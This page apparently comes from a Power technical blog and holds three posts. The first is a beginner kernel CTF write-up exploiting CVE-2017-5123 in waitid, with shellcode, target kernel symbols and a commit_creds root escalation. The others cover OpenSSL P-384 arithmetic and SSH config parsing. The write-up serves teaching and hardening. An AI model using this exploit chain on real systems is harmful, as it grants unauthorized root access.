Store Halfword Byte-Reverse Indexed

A Power Technical Blog

Beginner's first kernel CTF with CVE-2017-5123

The other kind of kernel hacking

Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:

  • it should be exploiting a real world vulnerability
  • it should be on Power (since that's what we do around here)
  • it should be conceptually simple to understand (and not require knowledge of network stacks or sandboxes etc)
  • it's more important to be educational than to be realistic

So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!

Stage 1: the bug

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;
    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
    }

    if (!err) {
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user((short)info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

This is the implementation of the waitid syscall in Linux v4.13, released in September 2017. For our purposes it doesn't matter what the syscall is supposed to do - there's a serious bug here that will let us do very naughty things. Try and spot it yourself, though it may not be obvious unless you're familiar with the kernel's user access routines.

#define put_user(x, ptr)                        \
({                                  \
    __typeof__(*(ptr)) __user *_pu_addr = (ptr);            \
                                    \
    access_ok(_pu_addr, sizeof(*(ptr))) ?               \
          __put_user(x, _pu_addr) : -EFAULT;            \
})

This is put_user() from arch/powerpc/include/asm/uaccess.h. The implementation goes deeper, but this tells us that the normal way the kernel would write to user memory involves calling access_ok() and only performing the write if the access was indeed OK (meaning the address is in user memory, not kernel memory). As the name may suggest, unsafe_put_user() skips that part, and for good reason - sometimes you want to do multiple user accesses at once. With SMAP/PAN/KUAP etc enabled, every put_user() will enable user access, perform its operation then disable it again, which is very inefficient. Instead, patterns like in waitid above are rather common - enable user access, perform a bunch of "unsafe" operations and then disable user access again.

The bug in waitid is that access_ok() is never called, and thus there is no validation that the user provided pointer *infop is pointing to user memory instead of kernel memory. Calling waitid and pointing into kernel memory allows unprivileged users to write into whatever they're pointing at. Neat! This is CVE-2017-5123, summarised as "Insufficient data validation in waitid allowed an user to escape sandboxes on Linux". It's a primitive that can be used for more than that, but that's what its discoverer used it for, escaping the Chrome sandbox.

If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!

A tangent: API design

Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.

Let's have a look at the waitid syscall implementation as it is in upstream Linux at the time of writing.

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
        infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;

    if (!user_write_access_begin(infop, sizeof(*infop)))
        return -EFAULT;

    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_write_access_end();
    return err;
Efault:
    user_write_access_end();
    return -EFAULT;
}

Notice any differences? Not a lot has changed, but instead of an unconditional user_access_begin(), there's now a call to user_write_access_begin(). Not only have the user access functions been split into read and write (though whether there's actually read/write granularity under the hood depends on the MMU-specific implementation), but the _begin() function takes a pointer and the size of the write. And what do you think that's doing...

static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
    if (unlikely(!access_ok(ptr, len)))
        return false;

    might_fault();

    allow_write_to_user((void __user *)ptr, len);
    return true;
}

That's right! The missing access_ok() check from v4.13 is now part of the API for enabling user access, so you can't forget it (without trying really hard). If there's something else you should be doing every time you call a function (i.e. access_ok() when calling user_access_begin()), it should probably just be part of the function, especially if there's a security implication.

This bug was fixed by adding in the missing access_ok() check, but it's very cool to see that bugs like this are now much less likely to get written.

Stage 2: the primitive

Before we do anything too interesting, we should figure out what we actually have here. We point our pointer at 0xc000000012345678 (an arbitrary kernel address) then take a look in gdb, revealing the following:

pwndbg> x/10 0xc000000012345678
0xc000000012345678:     17      0       1       0
0xc000000012345688:     2141    1001    1       0

So we know that we can at least set something to zero, and there's some potential for more mischief. We could fork() a lot to change the value of the PID to make our write a bit more arbitrary, but to not get too fancy I figured we should just see where we could get by setting something either to zero or to something non-zero.

A few targets came to mind. We could spray around where we think creds are located to try and overwrite the effective user ID of a process to 0, making it run as root. We could go after something like SELinux, aiming for flags like selinux_enabled and selinux_enforcing. I'm sure there's other sandbox-type controls we could try and escape from, too.

None of these were taking my CTF in the direction I wanted it to go (which was shellcode running in the kernel), so I decided to turn the realism down a notch and aim for exploiting a null pointer dereference. We'd map our shellcode to *0, induce a null pointer dereference in the kernel, and then our exploit would work. Right?

So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.

Stage 3: the target

I found an existing exploit doing the same thing I wanted to do, so I just stole the target from that. It has some comments in French which don't really help me, but thankfully I found another version with some additional comments - in Chinese. Oh well. have_canfork_callback is a symbol that marks whether cgroup subsystems have a can_fork() callback that is checked when a fork is attempted. If we overwrite have_canfork_callback to be non-zero when can_fork is still NULL, then we win! We can reliably reproduce a null pointer dereference as soon as we fork().

I'm sure there's heaps of different symbols we could have hit, but this one has some nice properties. Any non-zero write is enough, we can trigger the dereference at a time in our control with fork(), and to cover our bases we can just set it back to 0 later.

In our case, we had debug info and a debugger, so finding where the symbol was located in memory is pretty easy. There's also /proc/kallsyms which is great if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a headache or two here, and you can feel free to ask me why it's low on the priority list.

So now we have a null pointer dereference. Now let's get that doing something!

Stage 4: preparing the exploit

Virtual memory is one heck of a drug. If the kernel is going to execute from 0x0, we just need to mmap() to 0! Easy.

Well, it's not that easy. Turning any null pointer dereference into an easy attack vector is not ideal, so users aren't allowed to mmap to low address ranges, in our case, below PAGE_SIZE. Surely there's nothing in the kernel that would try to dereference a pointer + PAGE_SIZE? Maybe that's for a future CTF...

There's a sysctl for this, so in the actual CTF we just did sysctl -w vm.mmap_min_addr=0 and moved on for brevity. As I was writing this I decided to make sure it was possible to bypass this without cheating by making use of our kernel write primitive, and sure enough, it works! I had to zero out both mmap_min_addr and dac_mmap_min_addr symbols, the latter seemingly required for filesystem interactions to work post-exploit.

So now we can trigger a null pointer dereference in the kernel and we can mmap() our shellcode to 0x0, we should probably get some shellcode. We want to escalate our privileges, and the easiest way to do that is the iconic commit_creds(prepare_kernel_cred(0)).

prepare_kernel_cred() is intended to produce a credential for a kernel task. Passing 0/NULL gets you the same credential that init runs with, which is about as escalated as our privileges can get. commit_creds() applies the given credential to the currently running task - thus making our exploit run as root.

As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.

Stage 5: the shellcode

The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:

    static const unsigned char shellcode[] = {
        0x00, 0x00, 0xc0, 0x3b, // li r30, 0
        0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
        0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
        0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
        0xa6, 0x03, 0x89, 0x7d, // mtctr r12
        0x20, 0x04, 0x80, 0x4e, // bctr
    };

After the CTF I encouraged everyone to try writing their own shellcode and noone did, and I will take that as a sign that mine is flawlessly designed.

First we throw 0 into r30, which sounds like a register we'll get away with clobbering. We load an offset of 32 bytes from the value of r30 into r12 (and r30 is 0, so this is the address 32). Then, we store the value of r30 (which is 0) into the address in r12 - writing zero to the address found at *32.

Then, we replace the contents of r12 with the value contained at address 24. Then, we move that value into the count register, and branch to the count register - redirecting execution to the address found at *24.

I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!

In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:

void get_root() {
    if (commit_creds && prepare_kernel_cred)
        commit_creds(prepare_kernel_cred(0));
}

Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:

    *(unsigned long *)24 = (unsigned long)get_root;

And that part's sorted. How good is C?

Noone guessed what address we were zeroing, though, and the answer is have_canfork_callback. Without mending that, the kernel will keep attempting to execute from address 0, which we don't want. We only need it to do that once!

So we wrap up with

    *(unsigned long *)32 = have_canfork_callback;

and our shellcode's ready to go!

Stage 6: it doesn't work

We've had good progress so far - we needed a way to get the kernel to execute from address 0 and we found a way to do that, and we needed to mmap to 0 and we found a way to do that. And yet, running the exploit doesn't work. How come?

Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]

The MMU has ended our fun. KUEP is enabled (SMEP on x86, PXN on ARM) so the MMU is enforcing that the kernel can't execute from user addresses. I gave everyone a bit of a trick question here - how can you get around this purely from the qemu command line?

The way I did it wasn't to parse nosmep (and I'm not even sure that was implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9 to -cpu POWER8. Userspace execution prevention wasn't implemented in the MMU until POWER9, so reverting to an older processor was a cheeky way to get around that.

Stage 7: victory!

Putting all of that together, we have a successful privilege escalation from attacking the kernel.

/ $ ./exploit 
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root

It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, so it really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team and wasn't too contrived for the sake of simplicity.

Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!

Going out on a Limb: Efficient Elliptic Curve Arithmetic in OpenSSL

So I've just managed to upstream some changes to OpenSSL for a new strategy I've developed for efficient arithmetic used in secp384r1, a curve prescribed by NIST for digital signatures and key exchange. In spite of its prevalence, its implementation in OpenSSL has remained somewhat unoptimised, even as less frequently used curves (P224, P256, P521) each have their own optimisations.

The strategy I have used could be called a 56-bit redundant limb implementation with Solinas reduction. Without too much micro-optimisation, we get ~5.5x speedup over the default (Montgomery Multiplication) implementation for creation of digital signatures.

How is this possible? Well first let's quickly explain some language:

Elliptic Curves

When it comes to cryptography, it's highly likely that those with a computer science background will be familiar with ideas such as key-exchange and private-key signing. The stand-in asymmetric cipher in a typical computer science curriculum is typically RSA. However, the heyday of Elliptic Curve ciphers has well and truly arrived, and their operation seems no less mystical than when they were just a toy for academia.

The word 'Elliptic' may seem to imply continuous mathematics. As a useful cryptographic problem, we fundamentally are just interested with the algebraic properties of these curves, whose points are elements of a finite field. Irrespective of the underlying finite field, the algebraic properties of the elliptic curve group can be shown to exist by an application of Bézout's Theorem. The group operator on points on an elliptic curve for a particular choice of field involves the intersection of lines intersecting either once, twice or thrice with the curve, granting notions of addition and doubling for the points of intersection, and giving the 'point at infinity' as the group identity. A closed form exists for computing a point double/addition in arbitrary fields (different closed forms can apply, but determined by the field's characteristic, and the same closed form applies for all large prime fields).

Our algorithm uses a field of the form \(\mathbb{F}_p\), that is the unique field with \(p\) (a prime) elements. The most straightforward construction of this field is arithmetic modulo \(p\). The other finite fields used in practise in ECC are of the form \(\mathbb{F}_{2^m}\) and are sometimes called 'binary fields' (representible as polynomials with binary coefficients). Their field structure is also used in AES through byte substitution, implemented by inversion modulo \(\mathbb{F}_{2^8}\).

From a performance perspective, great optimisations can be made by implementing efficient fixed-point arithmetic specialised to modulo by single prime constant, \(p\). From here on out, I'll be speaking from this abstraction layer alone.

Limbs

We wish to multiply two \(m\)-bit numbers, each of which represented with \(n\) 64-bit machine words in some way. Let's suppose just for now that \(n\) divides \(m\) neatly, then the quotient \(d\) is the minimum number of bits in each machine word that will be required for representing our number. Suppose we use the straightforward representation whereby the least significant \(d\) bits are used for storing parts of our number, which we better call \(x\) because this is crypto and descriptive variable names are considered harmful (apparently).

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

If we then drop the requirement for each of our \(n\) machine words (also referred to as a 'limb' from hereon out) to have no more than the least significant \(d\) bits populated, we say that such an implementation uses 'redundant limbs', meaning that the \(k\)-th limb has high bits which overlap with the place values represented in the \((k+1)\)-th limb.

Multiplication (mod p)

The fundamental difficulty with making modulo arithmetic fast is to do with the following property of multiplication.

Let \(a\) and \(b\) be \(m\)-bit numbers, then \(0 \leq a < 2^m\) and \(0 \leq b < 2^m\), but critically we cannot say the same about \(ab\). Instead, the best we can say is that \(0 \leq ab < 2^{2m}\). Multiplication can in the worst case double the number of bits that must be stored, unless we can reduce modulo our prime.

If we begin with non-redundant, 56-bit limbs, then for \(a\) and \(b\) not too much larger than \(2^{384} > p_{384}\) that are 'reduced sufficiently' then we can multiply our limbs in the following ladder, so long as we are capable of storing the following sums without overflow.

    /* and so on ... */

    out[5] = ((uint128_t) in1[0]) * in2[5]
           + ((uint128_t) in1[1]) * in2[4]
           + ((uint128_t) in1[2]) * in2[3]
           + ((uint128_t) in1[3]) * in2[2]
           + ((uint128_t) in1[4]) * in2[1]
           + ((uint128_t) in1[5]) * in2[0];

    out[6] = ((uint128_t) in1[0]) * in2[6]
           + ((uint128_t) in1[1]) * in2[5]
           + ((uint128_t) in1[2]) * in2[4]
           + ((uint128_t) in1[3]) * in2[3]
           + ((uint128_t) in1[4]) * in2[2]
           + ((uint128_t) in1[5]) * in2[1]
           + ((uint128_t) in1[6]) * in2[0];

    out[7] = ((uint128_t) in1[1]) * in2[6]
           + ((uint128_t) in1[2]) * in2[5]
           + ((uint128_t) in1[3]) * in2[4]
           + ((uint128_t) in1[4]) * in2[3]
           + ((uint128_t) in1[5]) * in2[2]
           + ((uint128_t) in1[6]) * in2[1];

    out[8] = ((uint128_t) in1[2]) * in2[6]
           + ((uint128_t) in1[3]) * in2[5]
           + ((uint128_t) in1[4]) * in2[4]
           + ((uint128_t) in1[5]) * in2[3]
           + ((uint128_t) in1[6]) * in2[2];

    /* ... and so forth */

This is possible, if we back each of the 56-bit limbs with a 64-bit machine word, with products being stored in 128-bit machine words. The numbers \(a\) and \(b\) were able to be stored with 7 limbs, whereas we use 13 limbs for storing the product. If \(a\) and \(b\) were stored non-redundantly, than each of the output (redundant) limbs must contain values less than \(6 \cdot 2^{56} \cdot 2^{56} < 2^{115}\), so there is no possibility of overflow in 128 bits. We even have room spare to do some additions/subtractions in cheap, redundant limb arithmetic.

But we can't keep doing our sums in redundant limb arithmetic forever, we must eventually reduce. Doing so may be expensive, and so we would rather reduce only when strictly necessary!

Solinas-ish Reduction

Our prime is a Solinas (Pseudo/Generalised-Mersenne) Prime. Mersenne Primes are primes expressible as \(2^m - 1\). This can be generalised to low-degree polynomials in \(2^m\). For example, another NIST curve uses \(p_{224} = 2^{224} - 2^{96} + 1\) (a 224-bit number) where \(p_{224} = f(2^{32})\) for \(f(t) = t^7 - t^3 + 1\). The simpler the choice of polynomial, the simpler the modular reduction logic.

Our choice of \(t\) is \(2^{56}\). Wikipedia the ideal case for Solinas reduction where the bitwidth of the prime is divisible by \(\log_2{t}\), but that is not our scenario. We choose 56-bits for some pretty simple realities of hardware. 56 is less than 64 (standard machine word size) but not by too much, and the difference is byte-addressible (\(64-56=8\)). Let me explain:

Just the Right Amount of Reduction (mod p)

Let's first describe the actual prime that is our modulus.

$$p_{384} = 2^{384} - 2^{128} - 2^{96} + 2^{32} - 1$$

Yuck. This number is so yuck in fact, that noone has so far managed to upstream a Solinas' reduction method for it in OpenSSL, in spite of secp384r1 being the preferred curve for ECDH (Elliptic Curve Diffie-Hellman key exchange) and ECDSA (Elliptic Curve Digital Signature Algorithm) by NIST.

In 56-bit limbs, we would express this number so:

Let \(f(t) = 2^{48} t^6 - 2^{16} t^2 - 2^{40} t + (2^{32} - 1)\), then observe that all coefficients are smaller than \(2^{56}\), and that \(p_{384} = f(2^{56})\).

Now let \(\delta(t) = 2^{16} t^2 + 2^{40} t - 2^{32} + 1\), consider that \(p_{384} = 2^{384} - \delta(2^{56})\), and thus \(2^{384} \equiv \delta(2^{56}) \mod{p_{384}}\). From now on let's call \(\delta(2^{56})\) just \(\delta\). Thus, 'reduction' can be achieved as follows for suitable \(X\) and \(Y\):

$$ab = X + 2^{384} Y \equiv X + \delta Y \mod{p_{384}}$$

Calculating \(\delta Y\)

First Substitution

First make a choice of \(X\) and \(Y\). The first thing to observe here is that this can actually be made a large number of ways! We choose:

$$X_1 = \sum_{k=0}^8\texttt{in[k]} t^k$$
$$Y_1 = 2^8 t^2 \sum_{k=9}^{12}\texttt{in[k]} t^{k-9} = 2^8 \sum_{k=9}^{12}\texttt{in[k]} t^{k-7}$$

'Where does the \(2^8 t^{2}\) come from?' I hear you ask. See \(t^9 = t^2 \cdot t^7 = t^2 (2^8 \cdot 2^{384}) \equiv (2^8 t^2) \delta \mod{f(t)}\). It's clear to see that the place value of in[9] ... in[12] is greater than \(2^{384}\).

I'm using the subscripts here because we're in fact going to do a series of these reductions to reach a suitably small answer. That's because our equation for reducing \(t^7\) terms is as follows:

$$t^7 \equiv 2^8\delta \equiv 2^{24} t^2 + 2^{48} t + (-2^{40} + 2^8) \mod{f(t)}$$

Thus reducing in[12] involves computing:

$$\texttt{in[12]} t^{12} = \texttt{in[12]} (t^5)(t^7) \equiv 2^8\delta \cdot \texttt{in[12]} t^5 \mod{f(t)}$$

But \(\delta\) is a degree two polynomial, and so our numbers can still have two more limbs than we would want them to have. To be safe, let's store \(X_1 + \delta Y_1\) in accumulator limbs acc[0] ... acc[8] (this will at first appear to be one more limb than necessary), then we can eliminate in[12] with the following logic.

    /* assign accumulators to begin */
    for (int i = 0; i < 9; i++)
        acc[i] = in[i];

    /* X += 2^128 Y */
    acc[8] += in[12] >> 32;
    acc[7] += (in[12] & 0xffffffff) << 24;

    /* X += 2^96 Y */
    acc[7] += in[12] >> 8;
    acc[6] += (in[12] & 0xff) << 48;

    /* X += (-2^32 + 1) Y */
    acc[6] -= in[12] >> 16;
    acc[5] -= ((in[12] & 0xffff) << 40);
    acc[6] += in[12] >> 48;
    acc[5] += (in[12] & 0xffffffffffff) << 8;

Notice that for each term in \(\delta = 2^{128} + 2^{96} + (2^{32} - 1)\) we do two additions/subtractions. This is in order to split up operands in order to minimise the final size of numbers and prevent over/underflows. Consequently, we need an acc[8] to receive the high bits of our in[12] substitution given above.

Second Substitution

Let's try and now eliminate through substitution acc[7] and acc[8]. Let

$$X_2 = \sum^{6}_{k=0}\texttt{acc[k]}t^k $$
$$Y_2 = 2^8(\texttt{acc[7]} t^7 + \texttt{acc[8]} t^8)$$

But this time, \(\delta Y_2\) is a number that comfortably can take up just five limbs, so we can update acc[0], ..., acc[5] comfortably in-place.

Third Substitution

Finally, let's reduce all the high bits of in[6]. Since in[6] has place value \(t^6 = 2^{336}\), thus we wish to reduce all but the least significant \(384 - 336 = 48\) bits.

A goal in designing this algorithm is to ensure that acc[6] has as tight a bound as reasonably possible. Intuitively, if we can cause acc[6] to be as large as possible by absorbing the high bits of lower limbs, we reduce the number of bits that must be carried forward later on. As such, we perform a carry of the high-bits of acc[4], acc[5] into acc[6] before we begin our substitution.

Again, let

$$X_3 = \sum^{5}_{k=0}\texttt{acc[k]}t^k + (\texttt{acc[6]} \text{(low bits)})t^6$$
$$Y_3 = 2^{48}(\texttt{acc[6]} \text{(high bits, right shifted)}) t^6$$

The equation for eliminating \(2^{48}t^6\) is pretty straightforward:

$$2^{384} = 2^{48}t^6 \equiv 2^{16}t^2 + 2^{40}t + (-2^{32} + 1) \mod{f(t)}$$

Carries

Finally, as each of acc[0], ..., acc[6] can contain values larger than \(2^{56}\), we carry their respective high bits into acc[6] so as to remove any redundancy. Conveniently, our preemptive carrying before the third substitution has granted us a pretty tight bound on our final calculation - the final reduced number has the range \([0, 2^{384}]\).

Canonicalisation

This is 'just the right amount of reduction' but not canonicalisation. That is, since \(0 < p_{384} < 2^{384}\), there can be multiple possible reduced values for a given congruence class. felem_contract is a method which uses the fact that \(0 \leq x < 2 p_{384}\) to further reduce the output of felem_reduce into the range \([0, p_{384})\) in constant time.

This code has many more dragons I won't explain here, but the basic premise to the calculations performed there is as follows:

Given a 385 bit input, checking whether our input (expressed as a concatenation of bits) \(b_{384}b_{383} \ldots b_1b_0\) is greater than or equal to \(p_{384}\) whose bits we denote \(q_{384}, \ldots, q_0\) (\(q_{384} = 0\)) is determined by the following logical predicate (\(G(384)\)):

$$G(k) \equiv (b_k \land \lnot q_k) \lor ((b_k = q_k) \land G(k-1))$$
$$G(0) \equiv b_k = q_k$$

With \(p_{384}\) being a Solinas'/Pseudo-Mersenne Prime, it has a large number of contiguous runs of repeated bits, so we can of course use this to massively simplify our predicate. Doing this in constant time involves some interesting bit-shifting/masking schenanigans. Essentially, you want a bit vector of all ones/zeros depending on the value of \(G(384)\), we then logically 'and' with this bitmask to 'conditionally' subtract \(p_{384}\) from our result.

A Side Note about the Weird Constants

Okay so we're implementing our modular arithmetic with unsigned integer limbs that together represent a number of the following form:

$$x = \sum_{k = 0}^{n-1} 2^{dk} l_k$$

How do we then do subtractions in a way which will make overflow impossible? Well computing \(a - b\) is really straightforward if every limb of \(a\) is larger than every limb of \(b\). We then add a suitable multiple of \(p_{384}\) to \(a\) that causes each limb of \(a\) to be sufficiently large.

Thankfully, with redundant-limb arithmetic, we can do this easily by means of telescopic sums. For example, in felem_reduce we wanted all limbs of our \(p_{384}\) multiple to be sufficiently large. We overshot any requirement and provided such a multiple which gives a lower bound \(2^{123}\). We first scale our prime accordingly so that its 'lead term' (speaking in the polynomial representation) is \(2^{124}\).

$$2^{76} f(t) = 2^{124} t^6 - 2^{92} t^2 - 2^{116} t + (2^{108} - 2^{76}) t^0$$

Notice that most limbs of this multiple (the limbs will be the coefficients) are either too small or negative. We then transform this expression into a suitable telescopic sum. Observe that when \(t = 2^{56}\), \(2^{124} t^k = 2^{124-56}t^{k+1} = 2^{68} t^{k+1}\), and so simply introduce into each limb where required a \(2^{124}\) term by means of addition, subtracting the same number from a higher limb.

$$ \begin{align*} 2^{76} f(t) &= (2^{124} - 2^{68}) t^6 \\ &+ (2^{124} - 2^{68}) t^5 \\ &+ (2^{124} - 2^{68}) t^4 \\ &+ (2^{124} - 2^{68}) t^3 \\ &+ (2^{124} - 2^{92} - 2^{68}) t^2 \\ &+ (2^{124} - 2^{116} - 2^{68}) t \\ &+ (2^{124} + 2^{108} - 2^{76}) \end{align*} $$

We can then subtract values whose limbs are no larger than the least of these limbs above without fear of underflows providing us with an incorrect result. In our case, that upper bound for limb value is \(2^{124} - 2^{116} - 2^{68} > 2^{123}\). Very comfortable.

Concerning Timing Side-Channels

Cryptographic routines must perform all of their calculations in constant time. More specifically, it is important that timing cryptography code should not reveal any private keys or random nonces used during computation. Ultimately, all of our work so far has been to speed up field arithmetic in the modulo field with prime \(p_{384}\). But this is done in order to facilitate calculations in the secp384r1 elliptic curve, and ECDSA/ECDH each depend on being able to perform scalar 'point multiplication' (repeat application of the group operator). Since such an operation is inherently iterative, it presents the greatest potential for timing attacks.

We implement constant-time multiplication with the wNAF ladder method. This relies on pre-computing a window of multiples of the group generator, and then scaling and selectively adding multiples when required. Wikipedia provides a helpful primer to this method by cumulatively building upon more naive approaches.

Conclusion

While the resulting code borrows from and uses common language of Solinas reduction, ultimately there are a number of implementation decisions that were guided by heuristic - going from theory to implementation was far from cut-and-dry. The limb size, carry order, choice of substitutions as well as pre and post conditions made here are ultimately arbitrary. You could easily imagine there being further refinements obtaining a better result. For now, I hope this post serves to demystify the inner workings of ECC implementations in OpenSSL. These algorithms, although particular and sophisticated, need not be immutable.

Quirks of parsing SSH configs

Introduction

I've been using the VSCodium Open Remote - SSH extension recently to great results. I can treat everything as a single environment, without any worry about syncing between my local development files and the remote. This is very different to mounting the remote as a network drive and opening a local instance of VSCodium on it: in addition to crippling latency on every action, a locally mounted drive doesn't bring the build context that tools like clangd require (e.g., system headers).

Instead, the remote extension runs a server on the remote that performs most actions, and the local VSCodium instance acts as a client that buffers and caches data seamlessly, so the experience is nearly as good as developing locally.

For example, a project wide file search on a network drive is unusably slow because every file and directory read requires a round trip back to the remote, and the latency is just too large to finish getting results back in a reasonable time. But with the client-server approach, the client just sends the search request to the server for it to fulfil, and all the server has to do is send the matches back. This eliminates nearly all the latency effects, except for the initial request and receiving any results.

However there has been one issue with using this for everything: the extension failed to connect when I wasn't on the same network as the host machine. So I wasn't able to use it when working from home over a VPN. In this post we find out why this happened, and in the process look at some of the weird quirks of parsing an SSH config.

The issue

As above, I wasn't able to connect to my remote machines when working from home. The extension would abort with the following error:

[Error  - 00:23:10.592] Error resolving authority
Error: getaddrinfo ENOTFOUND remotename.ozlabs.ibm.com
    at GetAddrInfoReqWrap.onlookup [as oncomplete] (node:dns:109:26)

So it's a DNS issue. This would make sense, as the remote machine is not exposed to the internet, and must instead be accessed through a proxy. What's weird is that the integrated terminal in VSCodium has no problem connecting to the remote. So the extension seems to be doing something different than just a plain SSH connection.

You might think that the extension is not reading the SSH config. But the extension panel lists all the host aliases I've declared in the config, so it's clearly aware of the config at least. Possibly it doesn't understand the proxy config correctly? If it was trying to connect directly from the host, it would make sense to fail a DNS lookup.

Investigating

Enough theorising, time to debug the extension as it tries to connect.

From the error above, the string "Error resolving authority" looks like something I can search for. This takes me to the catch case for a large try-catch block. It could be annoying to narrow down which part of the block throws the exception, but fortunately debugging is as easy as installing the dependencies and running the pre-configured 'Extension' debug target. This opens a new window with the local copy of the extension active, and I can debug it in the original window.

In this block, there is a conditional statement on whether the ProxyJump field is present in the config. This is a good place to break on and see what the computed config looks like. If it doesn't find a proxy then of course it's going to run everything on the host.

And indeed, it doesn't think there is a proxy. This is progress, but why does the extension's view of the config not match up with what SSH does? After all, invoking SSH directly connects properly. Tracing back the source of the config in the extension, it ultimately comes from manually reading in and parsing the SSH config. When resolving the host argument it manually computes the config as per ssh_config(5). Yet somewhere it makes a mistake, because it doesn't include the ProxyJump field.

Parsing SSH config

To get to the bottom of this, we need to know the rules behind parsing SSH configs. The ssh_config(5) manpage does a pretty decent job of explaining this, but I'm going to go over the relevant information here. I reckon most people have a vague idea of how it works, and can write enough to meet their needs, but have never looked deeper into the actual rules behind how SSH parses the config.

  1. For starters, the config is parsed line by line. Leading whitespace (i.e., indentation) is ignored. So, while indentation makes it look like you are configuring properties for a particular host, this isn't quite correct. Instead, the Host and Match lines are special statements that enable or disable all subsequent lines until the next Host or Match.

    There is no backtracking; previous conditions and lines are not re-evaluated after learning more about the config later on.

  2. When a config line is seen, and is active thanks to the most recent Host or Match succeeding, its value is selected if it is the first of that config to be selected. So the earliest place a value is set takes priority; this may be a little counterintuitive if you are used to having the latest value be picked, like enable/disable command line flags tend to work.

  3. When HostName is set, it replaces the host value in Match matches. It is also used as the Host value during a final pass (if requested).

  4. The last behaviour of interest is the Match final rule. There are several conditions a Match statement can have, and the final rule says make this active on the final pass over the config.

Wait, final pass? Multiple passes? Yes. If final is a condition on a Match, SSH will do another pass over the entire config, following all the rules above. Except this time all the configs we read on the first pass are still active (and can't be changed). But all the Host and Matches are re-evaluated, allowing other configs to potentially be set. I guess that means rule (1) ought to have a big asterisk next to it.

Together, these rules can lead to some quirky behaviours. Consider the following config

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

Host example
    HostName example.ozlabs.ibm.com

If I run ssh example on the command line, will it use the proxy?

By rule (1), no. When testing the first Match host condition, our host value is currently example. It is not until we reach the HostName config that we start using example.ozlabs.ibm.com for these matches.

But by rule (4), the answer turns into maybe. If we end up doing a second pass over the config thanks to a Match final that could be anywhere else, we would now be matching example.ozlabs.ibm.com against the first line on the second go around. This will pass, and, since nothing has set ProxyJump yet, we would gain the proxy.

You may think, yes, but we don't have a Match final in that example. But if you thought that, then you forgot about the system config.

The system config is effectively appended to the user config, to allow any system wide settings. Most of the time this isn't an issue because of the first-come-first-served rule with config matches (rule 2). But if the system config includes a Match final, it will trigger the entire config to be re-parsed, including the user section. And it so happens that, at least on Fedora with the openssh-clients package installed, the system config does contain a Match final (see /etc/ssh/ssh_config.d).

But wait, there's more! If we want to specify a custom SSH config file, then we can use -F path/to/config in the command line. But this disables loading a system config, so we would no longer get the proxy!

To sum up, for the above config:

  1. ssh example doesn't have a proxy
  2. ...unless a system config contains Match final
  3. ...but invoking it as ssh -F ~/.ssh/config example definitely won't have the proxy
  4. ...but if a subprocess invokes ssh example while trying to resolve another host, it'll probably not add the -F ~/.ssh/config, so we might get the proxy again (in the child process).

